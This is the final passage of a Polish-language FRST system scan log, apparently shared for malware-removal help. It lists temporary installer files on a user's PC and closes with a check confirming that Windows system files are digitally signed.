C:\Users\MAGDA\AppData\Local\Temp\GLFA4CD.EXE 2014-04-16 12:37 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLFA9F.EXE 2014-04-16 12:32 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLFACE6.EXE 2014-04-16 10:51 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLFAE8B.EXE 2014-04-16 10:43 - 2003-05-02 16:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLFB0DD.EXE 2014-04-16 11:12 - 2003-05-02 16:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLFB38C.EXE 2014-04-16 10:51 - 2003-05-02 15:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLFC547.EXE 2014-04-16 10:22 - 2003-05-02 15:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLFDAD.EXE 2014-04-16 10:10 - 2003-05-02 15:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLFE68.EXE 2014-04-16 12:33 - 2003-05-02 15:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLFE890.EXE 2014-04-16 10:10 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLFF0D9.EXE 2014-04-16 10:22 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLFF674.EXE 2014-04-16 12:29 - 2010-06-20 23:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLFFDF2.EXE 2014-04-16 15:08 - 2014-04-16 15:08 - 1472720 _____ () C:\Users\MAGDA\AppData\Local\Temp\GuardMailRu.exe 2015-06-25 15:52 - 2015-06-25 15:52 - 0843240 _____ (Generic Internet Program ) C:\Users\MAGDA\AppData\Local\Temp\ICReinstall_WinRAR(12398)-dp.exe 2014-04-17 13:10 - 2014-04-17 13:10 - 1071792 _____ (Solid State Networks) C:\Users\MAGDA\AppData\Local\Temp\install_reader11_pl_mssd_aaa_aih.exe 2016-08-30 07:18 - 2016-08-30 07:18 - 0741440 _____ (Oracle Corporation) C:\Users\MAGDA\AppData\Local\Temp\jre-8u101-windows-au.exe 2017-03-10 08:55 - 2017-03-10 08:55 - 0739904 _____ (Oracle Corporation) C:\Users\MAGDA\AppData\Local\Temp\jre-8u121-windows-au.exe 2017-05-17 14:29 - 2017-05-17 14:29 - 0739904 _____ (Oracle Corporation) C:\Users\MAGDA\AppData\Local\Temp\jre-8u131-windows-au.exe 2015-08-27 08:46 - 2015-08-27 08:46 - 0585824 _____ (Oracle Corporation) C:\Users\MAGDA\AppData\Local\Temp\jre-8u60-windows-au.exe 2010-08-13 06:57 - 2010-08-13 06:57 - 0149352 ____R (Microsoft Corporation) C:\Users\MAGDA\AppData\Local\Temp\ose00000.exe 2014-11-08 10:33 - 2015-06-21 19:56 - 0610816 _____ () C:\Users\MAGDA\AppData\Local\Temp\Quarantine.exe 2013-06-20 18:49 - 2013-06-20 18:49 - 60281152 ____R () C:\Users\MAGDA\AppData\Local\Temp\Setup.exe 2015-03-23 09:11 - 2015-03-23 09:11 - 45209696 _____ (Skype Technologies S.A.) C:\Users\MAGDA\AppData\Local\Temp\SkypeSetup.exe 2014-11-08 10:47 - 2014-10-17 13:39 - 0665682 _____ (SQLite Development Team) C:\Users\MAGDA\AppData\Local\Temp\sqlite3.dll ==================== Bamital & volsnap ====================== (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) C:\Windows\system32\winlogon.exe => Plik podpisany cyfrowo C:\Windows\system32\wininit.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\wininit.exe => Plik podpisany cyfrowo C:\Windows\explorer.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\explorer.exe => Plik podpisany cyfrowo C:\Windows\system32\svchost.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\svchost.exe => Plik podpisany cyfrowo C:\Windows\system32\services.exe => Plik podpisany cyfrowo C:\Windows\system32\User32.dll => Plik podpisany cyfrowo C:\Windows\SysWOW64\User32.dll => Plik podpisany cyfrowo C:\Windows\system32\userinit.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\userinit.exe => Plik podpisany cyfrowo C:\Windows\system32\rpcss.dll => Plik podpisany cyfrowo C:\Windows\system32\dnsapi.dll => Plik podpisany cyfrowo C:\Windows\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo C:\Windows\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo LastRegBack: 2016-06-23 11:09 ==================== Koniec FRST.txt ============================